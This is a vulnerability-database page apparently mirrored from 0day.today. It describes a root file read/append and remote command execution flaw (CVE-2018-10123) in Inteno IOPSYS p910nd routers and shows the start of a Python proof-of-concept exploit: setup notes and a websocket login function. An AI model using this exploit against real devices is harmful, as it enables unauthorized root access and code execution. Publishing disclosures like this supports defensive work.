Lucene search
K

Inteno IOPSYS 2.0 - 4.2.0 p910nd - Remote Command Execution Exploit

🗓️ 16 May 2018 00:00:00Reported by neonseaType 
zdt
 zdt
🔗 0day.today👁 33 Views

Any authenticated user can modify configuration to read and append to any file as root, leading to info disclosure and remote code execution (CVE-2018-10123)

Related
Code
ReporterTitlePublishedViews
Family
CNVD
Inteno IOPSYS p910nd Arbitrary File Read Vulnerability
18 May 201800:00
cnvd
CVE
CVE-2018-10123
16 May 201813:00
cve
Cvelist
CVE-2018-10123
16 May 201813:00
cvelist
Exploit DB
Inteno IOPSYS 2.0 < 4.2.0 - 'p910nd' Remote Command Execution
16 May 201800:00
exploitdb
exploitpack
Inteno IOPSYS 2.0 4.2.0 - p910nd Remote Command Execution
16 May 201800:00
exploitpack
NVD
CVE-2018-10123
16 May 201813:29
nvd
Packet Storm
Inteno IOPSYS 2.0 - 4.2.0 p910nd Remote Command Execution
16 May 201800:00
packetstorm
Prion
Code injection
16 May 201813:29
prion
'''
Any authenticated user can modify the configuration for it in a way which allows them to read and append to any file as root. This leads to information disclosure and remote code execution. This vulnerability has been assigned the CVE ID: CVE-2018-10123.
 
This PoC requires Python 3.6 and a module called websocket-client which you can install by evoking pip install websocket-client. Please note that if you wish to use this, you should edit lines 58-61 of the script to include the proper IP, username, password and SSH key. You may also edit line 63 to include your own code for execution.
'''
 
#!/usr/bin/python3
 
import json
import sys
import socket
import os
import time
from websocket import create_connection
 
def ubusAuth(host, username, password):
    ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
    req = json.dumps({"jsonrpc":"2.0","method":"call",
        "params":["00000000000000000000000000000000","session","login",
        {"username": username,"password":password}],
        "id":666})
    ws.send(req)
    response =  json.loads(ws.recv())
    ws.close()
    try:
        key = response.get('result')[1].get('ubus_rpc_session')
    except IndexError:
        return(None)
    return(key)

#  0day.today [2018-05-16]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation